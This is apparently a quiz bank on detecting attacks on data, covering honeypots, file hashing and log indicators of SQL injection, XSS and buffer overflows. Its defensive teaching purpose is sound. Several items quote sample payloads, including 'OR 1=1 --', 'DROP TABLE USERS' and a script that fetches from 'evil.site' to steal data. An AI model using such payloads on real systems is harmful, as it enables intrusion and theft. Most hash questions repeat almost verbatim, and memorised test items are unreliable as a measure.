Multiple Choice
Identify the choice that best completes the statement or answers the question.

1. (1 point) What is the PRIMARY purpose of a honeypot file in data-security monitoring?
a. To speed up file transfers across the network.
b. To trigger an alert if someone accesses the file, because there is no legitimate reason to use it.
c. To replace encryption for all sensitive files.
d. To store real customer credit card numbers in an easy-to-find location.

2. (1 point) Why is access to a honeypot usually considered an indicator of compromise (IoC)?
a. Honeypots are used only to increase storage capacity.
b. The file is fake and should not be accessed during normal work, so access suggests malicious intent.
c. Any file access is always malicious.
d. Honeypots prevent all attacks automatically.

3. (1 point) Which honeypot design is MOST likely to attract a data thief?
a. A folder named 'Public_Forms' with blank templates
b. A file named 'ReadMe.txt' explaining office hours
c. A file named 'Payroll_2026_CreditCards.xlsx' filled with fake data
d. A file named 'Printer_Drivers' containing device manuals

4. (1 point) An alert shows someone opened a honeypot file labeled 'PII_Backup'. What is the BEST next step?
a. Investigate the account and device involved and review related access logs for other suspicious actions.
b. Assume it was a mistake and take no action.
c. Immediately delete all organization files to stop the attacker.
d. Ignore it because the data in the file is fake.

5. (1 point) Which statement BEST explains why honeypots help detection?
a. They stop buffer overflows by adding extra memory segments.
b. They make encryption unnecessary for sensitive files.
c. They provide a high-signal alert because legitimate users have no business need to access them.
d. They guarantee attackers will reveal their real identities.

6. (1 point) What is a key limitation of relying ONLY on honeypots for detecting attacks on data?
a. An attacker might steal real data without touching the honeypot, so other monitoring is still needed.
b. Honeypots prevent all attacks, so no limitation exists.
c. Honeypots can only detect natural disasters.
d. Honeypots automatically decrypt encrypted drives.

7. (1 point) How can a cryptographic hash help detect whether a file was altered?
a. The hash prevents anyone from opening the file.
b. The hash guarantees the file is stored in a secure location.
c. If the file changes, the hash digest will change, showing the content is different.
d. The hash converts ciphertext back into plaintext automatically.

8. (1 point) An organization stores a known-good hash for a configuration file. Today's hash does not match. What is the MOST reasonable conclusion?
a. The file's contents changed and could indicate unauthorized modification.
b. The network firewall rules are in the wrong order.
c. The user's password policy is too strict.
d. The file must be encrypted with a stronger key length.

9. (1 point) Which scenario BEST fits using hashes to detect attacks on data?
a. Blocking port 80 on an ACL
b. Using a password manager to create long passwords
c. Placing a camera at a building entrance
d. Comparing a file's current digest to a baseline digest to check for unexpected changes

10. (1 point) Why might an unexpected file hash change be suspicious even if the file name is the same?
a. An attacker can modify the contents without changing the file name, and the hash would reveal the change.
b. Hashes show the user's location and device type.
c. Hashes only change when the file is moved to a new folder.
d. Hashes only apply to encrypted data and not normal files.

11. (1 point) Which statement about hashes is MOST accurate in the context of detection?
a. Hashes are the same as passwords and can be reversed to reveal the original file.
b. Hashes are mainly used to increase download speeds.
c. Hashes prove who accessed a file and at what time.
d. Hashes help detect integrity problems by showing when data has changed unexpectedly.

12. (1 point) If a file's hash matches a known-good digest, what does that BEST suggest?
a. The file is encrypted with an asymmetric key.
b. The file is definitely free of all malware and risk.
c. The file's contents match the known-good version at the time of comparison.
d. The file was never accessed by anyone.

13. (1 point) Which approach BEST combines multiple detection ideas from this topic?
a. Review access logs for unusual patterns, use honeypot alerts, and verify critical file hashes.
b. Only disable USB ports and stop monitoring.
c. Only use a honeypot and ignore all other logs.
d. Only require password changes every 30 days.

14. (1 point) A user account shows many failed attempts to access a sensitive folder, then a successful access and a copy action. Which evidence would BEST help confirm this is malicious?
a. Whether the user printed a document last week
b. The employee's favorite browser
c. The color theme of the operating system
d. Correlating the access logs with device/location info and checking if any honeypot files were accessed

15. (1 point) What makes access logs useful for detecting attempts to COPY or DELETE files?
a. They replace the need for encryption and access control.
b. They record actions taken on data, allowing defenders to see suspicious operations, not just logins.
c. They automatically restore deleted files without backups.
d. They block all copy operations by default.

16. (1 point) Which event would MOST likely trigger a high-confidence alert with minimal false positives?
a. A scheduled system update that changes timestamps
b. A single login during normal hours from a known device
c. A user opening a file they use daily
d. Access to a well-designed honeypot file containing fake sensitive data

17. (1 point) Why should defenders investigate 'abrupt, unusual spikes' in file access and transfer logs?
a. Spikes can indicate automated copying or exfiltration attempts affecting many files quickly.
b. Spikes always mean the server is running faster than normal.
c. Spikes are required for encryption to work.
d. Spikes prove the data is safe because activity is visible.

18. (1 point) An attacker modifies a sensitive policy document without permission. Which detection method from this topic is MOST direct for spotting the change?
a. Comparing the file's current hash digest to a known-good digest
b. Using a stateless firewall to filter ports
c. Changing the SSID name
d. Disabling beacon frames on Wi-Fi

19. (1 point) Which description BEST matches an indicator of compromise (IoC) for data attacks?
a. Evidence in logs or files that suggests an adversary accessed, copied, deleted, or altered data.
b. A password that includes special characters.
c. A network cable labeled with the correct VLAN.
d. A company slogan reminding users to be careful.

20. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 1)
a. The file likely has not been altered between the two checks.
b. The file was encrypted overnight.
c. The file is definitely malware-free.
d. The hash function is broken.

21. (1 point) Why can hashes help detect whether a file was changed? (Question 2)
a. Hash functions are repeatable: the same input produces the same output.
b. Hash functions always encrypt files.
c. Hashes make files smaller.
d. Hashes remove viruses from files.

22. (1 point) Which tool could you use to calculate a file hash? (Question 3)
a. A spreadsheet chart tool
b. A word processor
c. A printer driver
d. A command line utility like shasum

23. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 4)
a. shasum -a 256 testfile
b. checksum /256 testfile
c. hash -s testfile 256
d. sha256 -file testfile

24. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 5)
a. The file can no longer be opened.
b. The computer's clock changed.
c. The file is stored in a different folder.
d. The file was altered after the first hash was recorded.

25. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 6)
a. The hash function is broken.
b. The file is definitely malware-free.
c. The file was encrypted overnight.
d. The file likely has not been altered between the two checks.

26. (1 point) Why can hashes help detect whether a file was changed? (Question 7)
a. Hashes make files smaller.
b. Hash functions always encrypt files.
c. Hashes remove viruses from files.
d. Hash functions are repeatable: the same input produces the same output.

27. (1 point) Which tool could you use to calculate a file hash? (Question 8)
a. A word processor
b. A spreadsheet chart tool
c. A command line utility like shasum
d. A printer driver

28. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 9)
a. checksum /256 testfile
b. sha256 -file testfile
c. hash -s testfile 256
d. shasum -a 256 testfile

29. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 10)
a. The file can no longer be opened.
b. The file was altered after the first hash was recorded.
c. The computer's clock changed.
d. The file is stored in a different folder.

30. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 11)
a. The file is definitely malware-free.
b. The file was encrypted overnight.
c. The file likely has not been altered between the two checks.
d. The hash function is broken.

31. (1 point) Why can hashes help detect whether a file was changed? (Question 12)
a. Hash functions are repeatable: the same input produces the same output.
b. Hash functions always encrypt files.
c. Hashes make files smaller.
d. Hashes remove viruses from files.

32. (1 point) Which tool could you use to calculate a file hash? (Question 13)
a. A printer driver
b. A command line utility like shasum
c. A word processor
d. A spreadsheet chart tool

33. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 14)
a. shasum -a 256 testfile
b. checksum /256 testfile
c. hash -s testfile 256
d. sha256 -file testfile

34. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 15)
a. The file was altered after the first hash was recorded.
b. The file is stored in a different folder.
c. The file can no longer be opened.
d. The computer's clock changed.

35. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 16)
a. The file is definitely malware-free.
b. The file likely has not been altered between the two checks.
c. The hash function is broken.
d. The file was encrypted overnight.

36. (1 point) Why can hashes help detect whether a file was changed? (Question 17)
a. Hash functions are repeatable: the same input produces the same output.
b. Hashes make files smaller.
c. Hashes remove viruses from files.
d. Hash functions always encrypt files.

37. (1 point) Which tool could you use to calculate a file hash? (Question 18)
a. A spreadsheet chart tool
b. A printer driver
c. A command line utility like shasum
d. A word processor

38. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 19)
a. sha256 -file testfile
b. shasum -a 256 testfile
c. hash -s testfile 256
d. checksum /256 testfile

39. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 20)
a. The file was altered after the first hash was recorded.
b. The file can no longer be opened.
c. The file is stored in a different folder.
d. The computer's clock changed.

40. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 21)
a. The hash function is broken.
b. The file is definitely malware-free.
c. The file likely has not been altered between the two checks.
d. The file was encrypted overnight.

41. (1 point) Why can hashes help detect whether a file was changed? (Question 22)
a. Hashes remove viruses from files.
b. Hash functions always encrypt files.
c. Hashes make files smaller.
d. Hash functions are repeatable: the same input produces the same output.

42. (1 point) Which tool could you use to calculate a file hash? (Question 23)
a. A printer driver
b. A spreadsheet chart tool
c. A command line utility like shasum
d. A word processor

43. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 24)
a. sha256 -file testfile
b. shasum -a 256 testfile
c. checksum /256 testfile
d. hash -s testfile 256

44. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 25)
a. The file was altered after the first hash was recorded.
b. The file is stored in a different folder.
c. The file can no longer be opened.
d. The computer's clock changed.

45. (1 point) A file's SHA-256 hash is calculated today and calculated again tomorrow. The hashes match. What is the best conclusion? (Question 26)
a. The file likely has not been altered between the two checks.
b. The hash function is broken.
c. The file was encrypted overnight.
d. The file is definitely malware-free.

46. (1 point) Why can hashes help detect whether a file was changed? (Question 27)
a. Hash functions are repeatable: the same input produces the same output.
b. Hashes remove viruses from files.
c. Hashes make files smaller.
d. Hash functions always encrypt files.

47. (1 point) Which tool could you use to calculate a file hash? (Question 28)
a. A spreadsheet chart tool
b. A command line utility like shasum
c. A word processor
d. A printer driver

48. (1 point) On a Mac using zsh, which command would generate a SHA-256 hash for a file named testfile? (Question 29)
a. hash -s testfile 256
b. checksum /256 testfile
c. shasum -a 256 testfile
d. sha256 -file testfile

49. (1 point) A security team records the hash of a file. Later the file's hash is different. What does that indicate? (Question 30)
a. The file is stored in a different folder.
b. The file can no longer be opened.
c. The computer's clock changed.
d. The file was altered after the first hash was recorded.

50. (1 point) A web app log shows the input: username=admin' OR 1=1 --. Which application attack does this most strongly indicate?
a. Buffer overflow
b. Credential stuffing
c. SQL injection
d. Cross-site scripting (XSS)

51. (1 point) In an application log, you see many requests containing the keyword FROM in all caps inside a search box. What is the most likely reason this is suspicious?
a. It proves the database is corrupted
b. It may indicate an attempted SQL injection using SQL control words
c. It confirms an XSS attack is successful
d. It shows the user is uploading malware

52. (1 point) Which log entry is the clearest indicator of an attempted SQL injection?
a. login failed for user jdoe
b. q=<script>alert(1)</script>
c. cookie=AAAAAA... (very long string)
d. q=books' WHERE 1=1 --

53. (1 point) A security analyst is reviewing user input and flags 'OR 1=1'. Why is this pattern commonly used by attackers?
a. It reduces the size of the request to avoid detection
b. It can turn a condition into 'true' to bypass checks and return extra data
c. It encrypts the query to hide it from logs
d. It forces the server to reboot

54. (1 point) A web server log contains: id=12; DROP TABLE USERS. What is the best next step for detecting whether this was an SQL injection attempt?
a. Review application/server logs for SQL control words and symbols like WHERE, FROM, and comment markers
b. Reimage the database server immediately without collecting evidence
c. Only check firewall logs for blocked IPs
d. Ignore it because semicolons are normal in URLs

55. (1 point) Which symbol in user input is specifically noted as suspicious for SQL injection because it starts a comment in SQL?
a. #!/bin/bash
b. %PDF
c. <script>
d. Double dash: --

56. (1 point) An app's error log repeatedly shows 'syntax error near WHERE' after users submit a form. What does this most likely suggest?
a. The site is experiencing a DDoS attack
b. User input may be altering SQL queries (possible SQL injection attempts)
c. The SSL certificate expired
d. A buffer overflow crashed the browser

57. (1 point) You see the following query parameter in logs: search=abc' IN (SELECT * FROM customers) --. Which category of indicator is this?
a. Normal user behavior
b. Suspicious HTML tags in user input
c. SQL control words and comment markers in user input
d. Unusually long cookie length

58. (1 point) A SIEM alert highlights many requests with 'OR 1=1' from the same IP. What is the best interpretation?
a. A successful XSS attack is stealing cookies
b. A buffer overflow is corrupting memory
c. An attacker is jamming Wi-Fi
d. Repeated SQL injection attempts are likely coming from that source

59. (1 point) Which log field is MOST relevant to check for SQL injection indicators listed in the EK (e.g., WHERE, FROM, --)?
a. Wireless signal strength logs
b. CPU temperature logs
c. User input captured in application or server logs
d. Printer spooler logs

60. (1 point) A comment field entry appears in logs as: <script>fetch('http://evil.site/steal')</script>. Which attack does this suggest?
a. Cross-site scripting (XSS)
b. SQL injection
c. Buffer overflow
d. MAC flooding

61. (1 point) Why is the <script></script> tag suspicious in user input for a web application?
a. It only affects server-side memory buffers
b. It automatically encrypts the user's data
c. It can cause the browser to run attacker-controlled code
d. It forces the database to delete tables

62. (1 point) Which input is the best example of an XSS indicator in logs?
a. OR 1=1 --
b. cookie length = 4096 bytes
c. WHERE id=5
d. <script>alert('hi')</script>

63. (1 point) A web app log shows user input: <ScRiPt>location.href='http://fake'</ScRiPt>. How should a defender treat this entry?
a. As normal HTML formatting
b. As a harmless SQL comment
c. As proof of a buffer overflow
d. As suspicious for XSS, since attackers may vary capitalization to bypass simple filters

64. (1 point) An analyst is searching logs for XSS. What is the most direct search term from the EK to start with?
a. 255.255.255.0
b. SYN-ACK
c. DROP
d. <script>

65. (1 point) A forum post contains: <script>document.cookie</script>. What data is the attacker most likely trying to access?
a. Browser-stored session information such as cookies
b. The router's routing table
c. The operating system kernel
d. The switch CAM table

66. (1 point) A company sees multiple requests that include '<script>' in a profile bio field. What is a reasonable conclusion?
a. The system clock is unsynchronized
b. Users may be attempting to inject scripts (possible XSS attempts)
c. The database is automatically backing up
d. The firewall is dropping private IP traffic

67. (1 point) Which log review action is most helpful for confirming XSS attempts?
a. Replace all Ethernet cables
b. Check only the ARP table on the gateway
c. Run tracert to the site
d. Check user input fields for suspicious HTML tags, especially <script></script>

68. (1 point) An attacker inserts script code into a site's comment field so that any visitor runs it. If you only had logs, what indicator would you look for?
a. Suspicious tags like <script> in stored user input
b. A long URL, cookie, or query string only
c. A burst of frames with many MAC addresses
d. A 'permission denied' error on chmod

69. (1 point) A WAF report shows it blocked a request due to 'XSS Detected' and the payload contained <script>. What does this suggest about the request?
a. It was a WPA3 encryption failure
b. It was a DNS poisoning attempt
c. It was a normal login attempt
d. It likely contained script injection content typical of XSS attempts

70. (1 point) Which web request characteristic is MOST likely to indicate an attempted buffer overflow, according to the EK?
a. Presence of WHERE and FROM keywords
b. Repeated login failures for one user
c. Presence of <script> tags
d. Unusually long URL length, cookie length, query string length, or total request length

71. (1 point) A log shows a request with a query string of 20,000 characters. What is the best interpretation?
a. Possible buffer overflow attempt due to unusually long input
b. Normal behavior for all browsers
c. Clear evidence of SQL injection
d. A sign of MAC spoofing

72. (1 point) A security analyst is checking for buffer overflow attempts on a web app. Which fields should they review?
a. ARP cache entries and MAC addresses
b. Subnet masks and routing metrics
c. URL length, cookie length, query string length, and total request length
d. BIOS password settings

73. (1 point) A cookie value in logs is extremely long and repeats 'A' thousands of times. Why might this be suspicious?
a. It always means the user is authenticated
b. It proves the server is encrypted with AES
c. Attackers may send long strings to overflow buffers in web applications
d. It indicates a phishing email was opened

74. (1 point) You see normal user input, but the total request length spikes to 50 KB repeatedly from one IP. What might this indicate?
a. A DHCP lease renewal
b. A normal NTP time sync
c. An attempted buffer overflow attack using oversized requests
d. A successful password reset

75. (1 point) Which log-based indicator best differentiates a buffer overflow attempt from an SQL injection attempt?
a. A SYN flag in TCP
b. Use of a VPN
c. Very long request fields (URL/cookies/query strings) rather than SQL control words like WHERE or OR 1=1
d. Presence of port 443 traffic

76. (1 point) A web server log shows: URL length=18000, cookie length=12000, query length=500. What should a defender do next?
a. Only check for SQL keywords in the request
b. Flag it as suspicious for a buffer overflow attempt and investigate the source and payload
c. Treat it as DNS poisoning
d. Assume it is safe because cookies can be long

77. (1 point) Why can checking request length help detect buffer overflow attempts?
a. Long requests automatically encrypt data
b. XSS attacks only happen in cookies
c. Buffer overflow attempts often involve sending more data than the application expects in fixed-size memory buffers
d. SQL injection attacks always require long URLs

78. (1 point) A security team wants to reduce false alarms when looking for buffer overflows. What is a good rule based on the EK?
a. Alert whenever a user logs in after 5 PM
b. Alert whenever the word FROM appears
c. Alert whenever any script tag appears in HTML output
d. Alert when URL/cookie/query string/total request lengths are unusually large compared to typical requests

79. (1 point) Which situation is the strongest indicator of a buffer overflow attempt in web logs?
a. A request contains <script>alert(1)</script>
b. A request contains OR 1=1 --
c. A single request includes an extremely long query string and total request size far above normal
d. A user mistypes their password twice